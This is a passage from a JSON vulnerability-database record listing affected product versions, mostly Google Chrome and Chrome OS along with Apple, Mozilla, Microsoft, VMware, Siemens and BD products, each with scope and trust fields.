        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.136"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.935.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.821.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.212.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.492.0"
      },
      {
        "model": "tvos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.33"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.923.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.46"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "42.0.2311"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.16"
      },
      {
        "model": "windows for 32-bit systems sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.547.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.41"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.948.0"
      },
      {
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20123"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.74"
      },
      {
        "model": "enterprise linux for ibm z systems extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.63"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "16.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.114"
      },
      {
        "model": "pyxis duostation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1024.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.784.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.149.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.16"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.15"
      },
      {
        "model": "windows server for 32-bit systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "46.0.2490.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1017.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.683.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.425.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.486.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "35.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.747.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.333"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.775.2"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.1"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017090"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.99"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1077.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.27"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1300.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.32"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.889.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1028"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.33"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.133"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.773.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.26"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.157"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.739.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.19"
      },
      {
        "model": "influx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.404.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.27"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.2491059"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.159.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1028.0"
      },
      {
        "model": "chrome os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "google",
        "version": "65.0.3325.167"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.95"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1013"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.658.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.159"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1023"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.761.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.369.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.690.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.44"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "9.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.16"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.24"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.93"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.660.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "57.0.2987.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.511.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1676.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.108"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.137"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1669.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.587.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.437.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.16"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.321.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "39.0.2171.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.48"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.861.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.524.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.717.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.9"
      },
      {
        "model": "sql server r2 for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "200830"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.880.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.607.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.471.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.923.1"
      },
      {
        "model": "simatic ipc477d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.9"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "37.0.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.126"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.1.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.89"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.3.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.309.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.232"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.778.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.447.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.4.154.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.655.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.115"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.579.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1008"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.694.0"
      },
      {
        "model": "bactec",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "90500"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.669.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1671.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.67"
      },
      {
        "model": "simatic s7-1500 software controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.702.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "47.0.2526.80"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.3"
      },
      {
        "model": "x-series xos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "11.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.190.2"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.4"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
